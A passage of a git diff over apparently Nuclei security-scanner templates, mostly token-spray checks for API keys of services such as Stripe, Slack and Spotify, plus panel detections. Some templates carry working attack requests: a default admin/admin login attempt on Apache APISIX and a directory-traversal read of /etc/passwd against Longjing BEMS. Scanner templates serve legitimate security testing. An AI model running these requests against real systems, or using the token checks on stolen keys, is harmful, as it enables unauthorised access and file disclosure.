{{secret}} - - matchers: - - type: word - part: body - words: - - '"id"' - - '"ipfs_pin_hash"' - condition: and diff --git a/poc/api/api-pivotaltracker.yaml b/poc/api/api-pivotaltracker.yaml new file mode 100644 index 0000000000..c52e04af9a --- /dev/null +++ b/poc/api/api-pivotaltracker.yaml @@ -0,0 +1,22 @@ +id: api-pivotaltracker + +info: + name: PivotalTracker API Test + author: zzeitlin + reference: https://www.pivotaltracker.com/help/api + severity: info + tags: token-spray,pivotaltracker + +requests: + - method: GET + path: + - "https://www.pivotaltracker.com/services/v5/me" + headers: + X-TrackerToken: "{{token}}" + + matchers: + - type: word + part: body + negative: true + words: + - 'invalid_authentication' diff --git a/poc/api/api-quip-484.yaml b/poc/api/api-quip-484.yaml deleted file mode 100644 index 520ba291c4..0000000000 --- a/poc/api/api-quip-484.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: api-quip - -info: - name: Quip API Test - author: daffainfo - severity: info - description: File Sharing and Storage for groups - reference: - - https://quip.com/dev/automation/documentation - - https://github.com/daffainfo/all-about-apikey/tree/main/quip - metadata: - max-request: 1 - tags: token-spray,quip - -self-contained: true - -http: - - raw: - - | - GET https://platform.quip.com/1/users/current HTTP/1.1 - Host: platform.quip.com - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - '"id":' - - '"name":' - condition: and - -# digest: 490a00463044022074368a1b835c4b2966cd00bd0fe53066ffbd869902b47479fc29cf13e0d07523022005b14ea954d61a64748d04f61fb42dfd16e88ed523a96cc30a5b357253872d11:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-quip.yaml b/poc/api/api-quip.yaml new file mode 100644 index 0000000000..70239345aa --- /dev/null +++ b/poc/api/api-quip.yaml @@ -0,0 +1,27 @@ +id: api-quip + +info: + name: Quip API Test + author: daffainfo + severity: info + description: File Sharing and Storage for groups + reference: + - https://quip.com/dev/automation/documentation + - https://github.com/daffainfo/all-about-apikey/tree/main/quip + tags: token-spray,quip + +self-contained: true +requests: + - raw: + - | + GET https://platform.quip.com/1/users/current HTTP/1.1 + Host: platform.quip.com + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"id":' + - '"name":' + condition: and diff --git a/poc/api/api-scanii-487.yaml b/poc/api/api-scanii-488.yaml similarity index 100% rename from poc/api/api-scanii-487.yaml rename to poc/api/api-scanii-488.yaml diff --git a/poc/api/api-scanii.yaml b/poc/api/api-scanii.yaml new file mode 100644 index 0000000000..a50bcb42a1 --- /dev/null +++ b/poc/api/api-scanii.yaml @@ -0,0 +1,26 @@ +id: api-scanii + +info: + name: Scanii API Test + author: daffainfo + severity: info + reference: + - https://docs.scanii.com/v2.1/resources.html + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Scanii.md + tags: token-spray,scanii + +self-contained: true +requests: + - raw: + - | + GET https://api.scanii.com/v2.1/ping HTTP/1.1 + Authorization: Basic {{base64(api + ':' + secret)}} + Host: api.scanii.com + + matchers: + - type: word + part: body + words: + - '"key"' + - '"message" : "pong"' + condition: and diff --git a/poc/api/api-sendgrid-489.yaml b/poc/api/api-sendgrid-489.yaml index b887b0b7d1..3c24d1dfaf 100644 --- a/poc/api/api-sendgrid-489.yaml +++ b/poc/api/api-sendgrid-489.yaml @@ -3,10 +3,11 @@ id: api-sendgrid info: name: Sendgrid API Test author: zzeitlin - reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp severity: info + reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp tags: token-spray,sendgrid +self-contained: true network: - inputs: - data: "ehlo\r\n" diff --git a/poc/api/api-slack-493.yaml b/poc/api/api-slack-493.yaml index 2703830f3a..d9a36d5801 100644 --- a/poc/api/api-slack-493.yaml +++ b/poc/api/api-slack-493.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,slack +self-contained: true requests: - method: POST path: @@ -18,5 +19,7 @@ requests: - type: word part: body words: - - 'error' - negative: true + - '"url":' + - '"team_id":' + - '"user_id":' + condition: and \ No newline at end of file diff --git a/poc/api/api-sonarcloud-494.yaml b/poc/api/api-sonarcloud-494.yaml index fdf0dc6724..f9759a80d3 100644 --- a/poc/api/api-sonarcloud-494.yaml +++ b/poc/api/api-sonarcloud-494.yaml @@ -3,19 +3,26 @@ id: api-sonarcloud info: name: SonarCloud API Test author: zzeitlin - reference: https://sonarcloud.io/web_api/api/authentication severity: info + reference: + - https://sonarcloud.io/web_api/api/authentication + metadata: + max-request: 1 tags: token-spray,sonarcloud -requests: +self-contained: true + +http: - method: GET path: - "https://sonarcloud.io/api/authentication/validate" + headers: Authorization: Basic {{base64(token + ':')}} - matchers: - type: word part: body words: - - 'true' + - '{"valid": true}' + +# digest: 4b0a00483046022100efd628805e8fd72d321c4b392a3a0b8594e4b5995a3e34fe8e4c212f233c4f3e02210097834810422bd619f28fd298381cc681d7d5453360fa2b1dcf1135313c620a44:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-spotify-495.yaml b/poc/api/api-spotify-495.yaml deleted file mode 100644 index 0f3cbc620d..0000000000 --- a/poc/api/api-spotify-495.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-spotify - -info: - name: Spotify API Test - author: zzeitlin - severity: info - reference: - - https://developer.spotify.com/documentation/general/guides/authorization-guide/ - metadata: - max-request: 1 - tags: token-spray,spotify - -self-contained: true - -http: - - method: GET - path: - - "https://api.spotify.com/v1/me/player/devices" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"devices":' - - '"id":' - - '"is_active":' - condition: and - -# digest: 4a0a00473045022100bfa9c51c453212bb217cccd26bd38e3a08368404e2fd3bd84800c76f4f3c0b8302207b37fcf4fb39b559417a5abc293f8a654383e066302f942d53e186707a6572dc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-spotify.yaml b/poc/api/api-spotify.yaml new file mode 100644 index 0000000000..ee518e36b4 --- /dev/null +++ b/poc/api/api-spotify.yaml @@ -0,0 +1,25 @@ +id: api-spotify + +info: + name: Spotify API Test + author: zzeitlin + severity: info + reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ + tags: token-spray,spotify + +self-contained: true +requests: + - method: GET + path: + - "https://api.spotify.com/v1/me/player/devices" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"devices":' + - '"id":' + - '"is_active":' + condition: and \ No newline at end of file diff --git a/poc/api/api-square-496.yaml b/poc/api/api-square-496.yaml index f1a17f211e..7ccb835189 100644 --- a/poc/api/api-square-496.yaml +++ b/poc/api/api-square-496.yaml @@ -3,31 +3,23 @@ id: api-square info: name: Square API Test author: zzeitlin + reference: https://developer.squareup.com/explorer/square/locations-api/list-locations severity: info - description: Easy way to take payments, manage refunds, and help customers checkout online - reference: - - https://developer.squareup.com/explorer/square/locations-api/list-locations - - https://github.com/daffainfo/all-about-apikey/tree/main/square - metadata: - max-request: 2 tags: token-spray,square self-contained: true - -http: +requests: - method: GET path: - "https://connect.squareup.com/v2/locations" - "https://connect.squareupsandbox.com/v2/locations" - headers: Content-Type: application/json Authorization: Bearer {{token}} + matchers: - type: word part: body words: - 'errors' negative: true - -# digest: 4b0a0048304602210090e48df8d3e3a46fa67ac5c5b63036e24ddf6170836e2a8d35a06cc422c3252102210080540ad0398f17ac9e74151aa72d7c37a9333e6fdd8d8a3212c08e8d8f229bd5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-square.yaml b/poc/api/api-square.yaml new file mode 100644 index 0000000000..383e3ddc8a --- /dev/null +++ b/poc/api/api-square.yaml @@ -0,0 +1,24 @@ +id: api-square + +info: + name: Square API Test + author: zzeitlin + reference: https://developer.squareup.com/explorer/square/locations-api/list-locations + severity: info + tags: token-spray,square + +requests: + - method: GET + path: + - "https://connect.squareup.com/v2/locations" + - "https://connect.squareupsandbox.com/v2/locations" + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - 'errors' + negative: true diff --git a/poc/api/api-stripe-499.yaml b/poc/api/api-stripe-499.yaml index 16e358e75a..d06b38bd8c 100644 --- a/poc/api/api-stripe-499.yaml +++ b/poc/api/api-stripe-499.yaml @@ -3,10 +3,11 @@ id: api-stripe info: name: Stripe API Test author: zzeitlin - reference: https://stripe.com/docs/api/authentication severity: info + reference: https://stripe.com/docs/api/authentication tags: token-spray,stripe +self-contained: true requests: - method: GET path: @@ -15,6 +16,10 @@ requests: Authorization: Basic {{base64(token + ':')}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"object":' + - '"url":' + - '"data":' + condition: and \ No newline at end of file diff --git a/poc/api/api-stripe.yaml b/poc/api/api-stripe.yaml new file mode 100644 index 0000000000..16e358e75a --- /dev/null +++ b/poc/api/api-stripe.yaml @@ -0,0 +1,20 @@ +id: api-stripe + +info: + name: Stripe API Test + author: zzeitlin + reference: https://stripe.com/docs/api/authentication + severity: info + tags: token-spray,stripe + +requests: + - method: GET + path: + - "https://api.stripe.com/v1/charges" + headers: + Authorization: Basic {{base64(token + ':')}} + + matchers: + - type: status + status: + - 200 diff --git a/poc/api/api-stytch-500.yaml b/poc/api/api-stytch-500.yaml deleted file mode 100644 index 0a4a0536b3..0000000000 --- a/poc/api/api-stytch-500.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: api-stytch - -info: - name: Stytch API Test - author: daffainfo - severity: info - description: User infrastructure for modern applications - reference: - - https://stytch.com/docs/api - - https://github.com/daffainfo/all-about-apikey/tree/main/stytch - metadata: - max-request: 1 - tags: token-spray,stytch - -self-contained: true - -http: - - raw: - - | - POST https://test.stytch.com/v1/users HTTP/1.1 - Authorization: Basic {{base64(id + ':' + secret)}} - Host: test.stytch.com - Content-Type: application/json - - {"email": "test@stytch.com"} - - matchers: - - type: word - part: body - words: - - '"status_code":' - - '"request_id":' - - '"user_id":' - condition: and - -# digest: 4b0a00483046022100a5cd3e56f14a5ca4f85a1244c252638f6287c623c199acd405e00ea2c8d2b4cb022100a793ced41f64583f4441e567c70c60d66e152ee792c7cea85a713109202c1662:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-stytch.yaml b/poc/api/api-stytch.yaml new file mode 100644 index 0000000000..37caf808d3 --- /dev/null +++ b/poc/api/api-stytch.yaml @@ -0,0 +1,31 @@ +id: api-stytch + +info: + name: Stytch API Test + author: daffainfo + severity: info + description: User infrastructure for modern applications + reference: + - https://stytch.com/docs/api + - https://github.com/daffainfo/all-about-apikey/tree/main/stytch + tags: token-spray,stytch + +self-contained: true +requests: + - raw: + - | + POST https://test.stytch.com/v1/users HTTP/1.1 + Authorization: Basic {{base64(id + ':' + secret)}} + Host: test.stytch.com + Content-Type: application/json + + {"email": "test@stytch.com"} + + matchers: + - type: word + part: body + words: + - '"status_code":' + - '"request_id":' + - '"user_id":' + condition: and \ No newline at end of file diff --git a/poc/api/api-tink-504.yaml b/poc/api/api-tink-504.yaml new file mode 100644 index 0000000000..7b16f84077 --- /dev/null +++ b/poc/api/api-tink-504.yaml @@ -0,0 +1,31 @@ +id: api-tink + +info: + name: Tink API Test + author: dwisiswant0 + severity: info + reference: + - https://docs.tink.com/api + metadata: + max-request: 1 + tags: token-spray,tink + +self-contained: true + +http: + - method: GET + path: + - "https://api.tink.com/api/v1/user" + + headers: + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - "appId" + - "externalUserId" + - "username" + condition: and + +# digest: 490a00463044022064bc122a937a39b63ea026801501211eec64ce7aa8adc30f055b2b4c87e69928022010d864dc724658ccf145c743989d9e1ea361b506b53e6d909eaeee6850ee8447:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-tink.yaml b/poc/api/api-tink.yaml deleted file mode 100644 index a7c5de8ccd..0000000000 --- a/poc/api/api-tink.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-tink - -info: - name: Tink API Test - author: dwisiswant0 - reference: https://docs.tink.com/api - severity: info - tags: token-spray,tink - -self-contained: true -requests: - - method: GET - path: - - "https://api.tink.com/api/v1/user" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - "appId" - - "externalUserId" - - "username" - condition: and diff --git a/poc/api/api-tinypng-505.yaml b/poc/api/api-tinypng-505.yaml index 357fb1bdbf..d4c96d8c2a 100644 --- a/poc/api/api-tinypng-505.yaml +++ b/poc/api/api-tinypng-505.yaml @@ -3,18 +3,22 @@ id: api-tinypng info: name: TinyPNG API Test author: zzeitlin - reference: https://tinypng.com/developers severity: info + reference: + - https://tinypng.com/developers + metadata: + max-request: 1 tags: token-spray,tinypng self-contained: true -requests: + +http: - method: POST path: - "https://api.tinify.com/shrink" + headers: Authorization: Basic {{base64('api:' + token)}} - matchers: - type: word part: header @@ -22,3 +26,5 @@ requests: - 'Compression-Count' - 'compression-count' condition: or + +# digest: 4a0a00473045022100ef6a53ed8e8e82c579cd8cc388c347d57cc2911b4a12228bd92306c8cdb3a86402203320dd7e0be941832c019b41fdab5f42b938a5f1264f7435c1931ec2bea36d58:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-travisci.yaml b/poc/api/api-travisci.yaml deleted file mode 100644 index 5212516fc1..0000000000 --- a/poc/api/api-travisci.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-travisci - -info: - name: Travis CI API Test - author: zzeitlin - reference: https://developer.travis-ci.com/ - severity: info - tags: token-spray,travis - -requests: - - method: GET - path: - - "https://api.travis-ci.com/user" - headers: - Travis-API-Version: 3 - Authorization: token {{token}} - - matchers: - - type: status - status: - - 403 - negative: true diff --git a/poc/api/api-twitter-507.yaml b/poc/api/api-twitter-507.yaml deleted file mode 100644 index a9a704e6b0..0000000000 --- a/poc/api/api-twitter-507.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-twitter - -info: - name: Twitter API Test - author: zzeitlin - severity: info - reference: - - https://developer.twitter.com/en/docs/twitter-api/api-reference-index - metadata: - max-request: 1 - tags: token-spray,twitter - -self-contained: true - -http: - - method: GET - path: - - "https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"account_name":' - - '"subscriptions_count_all":' - condition: and - -# digest: 490a0046304402201f9521f0cd83f3554263fbdeaad4741f2f3ca31b751092c94fd963af565f1ff50220407abb1793a0b6085d114c705dd6787a12930f4ac0c7974c4ee5abd41f6713f9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-twitter.yaml b/poc/api/api-twitter.yaml new file mode 100644 index 0000000000..ce6de967e8 --- /dev/null +++ b/poc/api/api-twitter.yaml @@ -0,0 +1,24 @@ +id: api-twitter + +info: + name: Twitter API Test + author: zzeitlin + severity: info + reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index + tags: token-spray,twitter + +self-contained: true +requests: + - method: GET + path: + - "https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"account_name":' + - '"subscriptions_count_all":' + condition: and diff --git a/poc/api/api-urlscan-509.yaml b/poc/api/api-urlscan-509.yaml new file mode 100644 index 0000000000..af192adaf4 --- /dev/null +++ b/poc/api/api-urlscan-509.yaml @@ -0,0 +1,34 @@ +id: api-urlscan + +info: + name: URLScan API Test + author: daffainfo + severity: info + description: Scan and Analyse URLs + reference: + - https://urlscan.io/docs/api/ + - https://github.com/daffainfo/all-about-apikey/tree/main/urlscan + metadata: + max-request: 1 + tags: token-spray,urlscan + +self-contained: true + +http: + - raw: + - | + GET https://urlscan.io/user/quotas/ HTTP/1.1 + Host: urlscan.io + Content-Type: application/json + API-Key: {{token}} + + matchers: + - type: word + part: body + words: + - 'X-Rate-Limit-Scope:' + - 'X-Rate-Limit-Limit:' + - 'X-Rate-Limit-Remaining:' + condition: and + +# digest: 4a0a0047304502203cb0701cadd396aaf22545b3fc8cdba4f6ad1ebc91776ea487ba439eb6c6b74a022100ac57630b68e70ca749e67081b8c4b527fe730c85f0805a8237199a50488cd329:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-virustotal-512.yaml b/poc/api/api-virustotal-512.yaml index 0c039312df..f48595c162 100644 --- a/poc/api/api-virustotal-512.yaml +++ b/poc/api/api-virustotal-512.yaml @@ -7,13 +7,10 @@ info: reference: - https://developers.virustotal.com/reference - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md - metadata: - max-request: 1 tags: token-spray,virustotal self-contained: true - -http: +requests: - raw: - | POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 @@ -27,9 +24,7 @@ http: - type: word part: body words: - - '"verbose_msg":' - - '"scan_date":' - - '"permalink":' + - "'verbose_msg':" + - "'scan_date':" + - "'permalink':" condition: and - -# digest: 4a0a0047304502206f6e83dbc66717b54926126ec584b60835783cb586214f57b93eb61d080e5a42022100d5a22a1ab5a848eb279134bd608e7b8288641d7fd089fe753bffd6de99668f8f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-virustotal-511.yaml b/poc/api/api-virustotal.yaml similarity index 100% rename from poc/api/api-virustotal-511.yaml rename to poc/api/api-virustotal.yaml diff --git a/poc/api/api-visualstudio-513.yaml b/poc/api/api-visualstudio-513.yaml new file mode 100644 index 0000000000..a64abf1582 --- /dev/null +++ b/poc/api/api-visualstudio-513.yaml @@ -0,0 +1,32 @@ +id: api-visualstudio + +info: + name: Visual Studio API Test + author: zzeitlin + severity: info + reference: + - https://openapi.appcenter.ms/ + metadata: + max-request: 1 + tags: token-spray,visualstudio,microsoft + +self-contained: true + +http: + - method: GET + path: + - "https://api.appcenter.ms/v0.1/apps" + + headers: + Content-Type: application/json + X-Api-Token: "{{token}}" + matchers: + - type: word + part: body + words: + - '"id":' + - '"description":' + - '"owner":' + condition: and + +# digest: 4a0a00473045022020bc75d51d8e12e2dbdd852c96a214335e197dc30535c920095b6b13f487c850022100805050b619bde77d62c60283bad92aba025ded6056670144f8e5b00bd93078b1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-visualstudio.yaml b/poc/api/api-visualstudio.yaml deleted file mode 100644 index a3440fdb9a..0000000000 --- a/poc/api/api-visualstudio.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-visualstudio - -info: - name: Visual Studio API Test - author: zzeitlin - severity: info - reference: https://openapi.appcenter.ms/ - tags: token-spray,visualstudio,microsoft - -self-contained: true -requests: - - method: GET - path: - - "https://api.appcenter.ms/v0.1/apps" - headers: - Content-Type: application/json - X-Api-Token: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"id":' - - '"description":' - - '"owner":' - condition: and diff --git a/poc/api/api-wakatime-514.yaml b/poc/api/api-wakatime.yaml similarity index 100% rename from poc/api/api-wakatime-514.yaml rename to poc/api/api-wakatime.yaml diff --git a/poc/api/api-wordcloud-517.yaml b/poc/api/api-wordcloud-517.yaml deleted file mode 100644 index 3f274ce4b7..0000000000 --- a/poc/api/api-wordcloud-517.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: api-wordcloud - -info: - name: Word Cloud API Test - author: daffainfo - severity: info - description: Easily create word clouds - reference: - - https://wordcloudapi.com/getting-started - - https://github.com/daffainfo/all-about-apikey/tree/main/word-cloud - metadata: - max-request: 1 - tags: token-spray,wordcloud - -self-contained: true - -http: - - raw: - - | - POST https://textvis-word-cloud-v1.p.rapidapi.com/v1/textToCloud HTTP/1.1 - Host: textvis-word-cloud-v1.p.rapidapi.com - content-type: application/json - x-rapidapi-host: textvis-word-cloud-v1.p.rapidapi.com - x-rapidapi-key: {{token}} - Content-Length: 349 - - { - "text": "This is a test. I repeat, this is a test. We are only testing the functionality of this api, nothing else. End of test.", - "scale": 0.5, - "width": 400, - "height": 400, - "colors": [ - "#375E97", - "#FB6542", - "#FFBB00", - "#3F681C" - ], - "font": "Tahoma", - "use_stopwords": true, - "language": "en", - "uppercase": false - } - - matchers: - - type: word - part: body - negative: true - words: - - '{"message":"You are not subscribed to this API."}' - -# digest: 4a0a0047304502200bb686f7740c3aa0631d8eff8a8c27854fef6f4e1c638d8a3075d1fd01dd81cb022100abe7621b7beb6ed80118f7f668d8151b8e45ec1fd802602bf80c4786332259f6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-youtube-519.yaml b/poc/api/api-youtube-519.yaml deleted file mode 100644 index 832da305b5..0000000000 --- a/poc/api/api-youtube-519.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-youtube - -info: - name: YouTube API Test - author: zzeitlin - severity: info - reference: - - https://developers.google.com/youtube/v3/docs - metadata: - max-request: 1 - tags: token-spray,youtube - -self-contained: true - -http: - - method: GET - path: - - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - - matchers: - - type: word - part: body - words: - - '"kind":' - - '"pageInfo":' - condition: and - -# digest: 4a0a004730450220736a86ef95feb0ef762e9857642ccf941afac2f9ea6920782f88724f5516128a02210099195000f3743f6b553cc99c71c70456c8160e1ff2acdd21fc5d54104a1df927:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-youtube.yaml b/poc/api/api-youtube.yaml new file mode 100644 index 0000000000..be1531a453 --- /dev/null +++ b/poc/api/api-youtube.yaml @@ -0,0 +1,22 @@ +id: api-youtube + +info: + name: YouTube API Test + author: zzeitlin + reference: https://developers.google.com/youtube/v3/docs + severity: info + tags: token-spray,youtube + +self-contained: true +requests: + - method: GET + path: + - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" + + matchers: + - type: word + part: body + words: + - '"kind":' + - '"pageInfo":' + condition: and \ No newline at end of file diff --git a/poc/api/apiman-panel-460.yaml b/poc/api/apiman-panel-460.yaml index 24bbf1f89b..85b65e14e6 100644 --- a/poc/api/apiman-panel-460.yaml +++ b/poc/api/apiman-panel-460.yaml @@ -5,11 +5,14 @@ info: author: righettod severity: info description: An Apiman instance was detected via the login redirection. + tags: panel,apiman reference: - https://www.apiman.io/latest/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: cwe-id: CWE-200 - tags: panel,apiman requests: - method: GET diff --git a/poc/api/apiman-panel-462.yaml b/poc/api/apiman-panel-462.yaml new file mode 100644 index 0000000000..24bbf1f89b --- /dev/null +++ b/poc/api/apiman-panel-462.yaml @@ -0,0 +1,30 @@ +id: apiman-panel + +info: + name: Apiman Login Panel + author: righettod + severity: info + description: An Apiman instance was detected via the login redirection. + reference: + - https://www.apiman.io/latest/ + classification: + cwe-id: CWE-200 + tags: panel,apiman + +requests: + - method: GET + path: + - "{{BaseURL}}/apimanui/api-manager" + + matchers-condition: and + matchers: + - type: word + words: + - "/auth/realms/apiman" + part: header + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/18 diff --git a/poc/api/apiman-panel-464.yaml b/poc/api/apiman-panel-464.yaml new file mode 100644 index 0000000000..72c5d57fcc --- /dev/null +++ b/poc/api/apiman-panel-464.yaml @@ -0,0 +1,32 @@ +id: apiman-panel + +info: + name: Apiman Login Panel + author: righettod + severity: info + description: An Apiman instance was detected via the login redirection. + reference: + - https://www.apiman.io/latest/ + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: panel,apiman + +http: + - method: GET + path: + - "{{BaseURL}}/apimanui/api-manager" + + matchers-condition: and + matchers: + - type: word + words: + - "/auth/realms/apiman" + part: header + + - type: status + status: + - 302 + +# digest: 4b0a00483046022100b79ecda1929aedc281bad1fc900d632afc56bb2305a46933fc7a7d3446a2e2cd022100d538233edfb8d9c36e38b1188932e0de90768e3f35b8cc44b8f308026a7702f4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/apisix-default-login-490.yaml b/poc/api/apisix-default-login-490.yaml index cb4e83e6df..87b1b252e0 100644 --- a/poc/api/apisix-default-login-490.yaml +++ b/poc/api/apisix-default-login-490.yaml @@ -5,19 +5,20 @@ info: author: pdteam severity: high description: An Apache Apisix default admin login was discovered. - metadata: - shodan-query: title:"Apache APISIX Dashboard" - fofa-query: title="Apache APISIX Dashboard" - product: https://apisix.apache.org reference: - https://apisix.apache.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 1 + product: https://apisix.apache.org + shodan-query: title:"Apache APISIX Dashboard" + fofa-query: title="Apache APISIX Dashboard" tags: apisix,apache,default-login -requests: +http: - raw: - | POST /apisix/admin/user/login HTTP/1.1 @@ -48,4 +49,4 @@ requests: - '"code":0' condition: and -# Enhanced by mp on 2022/03/22 +# digest: 4a0a00473045022100ed7246599d057edeb05c9cbb8f8e6e646ecd8f30c16f824b8fcd3fdb7fc0a4700220730ebc8209a21fced7ba192032e7731959b3eb50f22441f85ac5b3ef82e97e48:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/apisix-default-login-491.yaml b/poc/api/apisix-default-login-491.yaml new file mode 100644 index 0000000000..d89104b847 --- /dev/null +++ b/poc/api/apisix-default-login-491.yaml @@ -0,0 +1,51 @@ +id: apisix-default-login + +info: + name: Apache Apisix Default Admin Login + author: pdteam + severity: high + description: An Apache Apisix default admin login was discovered. + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"Apache APISIX Dashboard" + fofa-query: title="Apache APISIX Dashboard" + product: https://apisix.apache.org + tags: apisix,apache,default-login + +requests: + - raw: + - | + POST /apisix/admin/user/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + Authorization: + Content-Type: application/json;charset=UTF-8 + + {"username":"{{user}}","password":"{{pass}}"} + + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"data"' + - '"token"' + - '"code":0' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/api/arcgis-rest-api-532.yaml b/poc/api/arcgis-rest-api-532.yaml deleted file mode 100644 index b60cfd2026..0000000000 --- a/poc/api/arcgis-rest-api-532.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: arcgis-rest-api - -info: - name: ArcGIS Exposed Docs - author: Podalirius - severity: info - description: ArcGIS documents were discovered. - tags: api,arcgis,cms - reference: - - https://enterprise.arcgis.com/en/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/server/sdk/rest/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'ArcGIS REST API' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/api/arcgis-rest-api-533.yaml b/poc/api/arcgis-rest-api-533.yaml new file mode 100644 index 0000000000..897c70d812 --- /dev/null +++ b/poc/api/arcgis-rest-api-533.yaml @@ -0,0 +1,29 @@ +id: arcgis-rest-api + +info: + name: ArcGIS Exposed Docs + author: Podalirius + severity: info + description: ArcGIS documents were discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cwe-id: CWE-200 + tags: api,arcgis,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/server/sdk/rest/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS REST API' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/api/arcgis-rest-api.yaml b/poc/api/arcgis-rest-api.yaml index f230552dbc..b60cfd2026 100644 --- a/poc/api/arcgis-rest-api.yaml +++ b/poc/api/arcgis-rest-api.yaml @@ -1,19 +1,20 @@ id: arcgis-rest-api info: - name: ArcGIS Exposed REST API documentation + name: ArcGIS Exposed Docs author: Podalirius severity: info - description: ArcGIS REST API documentation was discovered. + description: ArcGIS documents were discovered. + tags: api,arcgis,cms reference: - https://enterprise.arcgis.com/en/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: cwe-id: CWE-200 - metadata: - max-request: 1 - tags: api,arcgis,cms,panel -http: +requests: - method: GET path: - '{{BaseURL}}/server/sdk/rest/index.html' @@ -28,4 +29,4 @@ http: status: - 200 -# digest: 4a0a0047304502206b9563fbbf34d888667c10a8a5a4dce68e81457f47edd26ab854c267c949e70f022100859b421e5c7a575e8f595314487d7ece97c9e8badc0129c5b368ad86cd8f50b6:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/20 diff --git a/poc/api/bems-api-lfi-707.yaml b/poc/api/bems-api-lfi-707.yaml new file mode 100644 index 0000000000..010b496245 --- /dev/null +++ b/poc/api/bems-api-lfi-707.yaml @@ -0,0 +1,24 @@ +id: bems-api-lfi + +info: + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + author: gy741 + severity: high + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/poc/api/bems-api-lfi-711.yaml b/poc/api/bems-api-lfi-712.yaml similarity 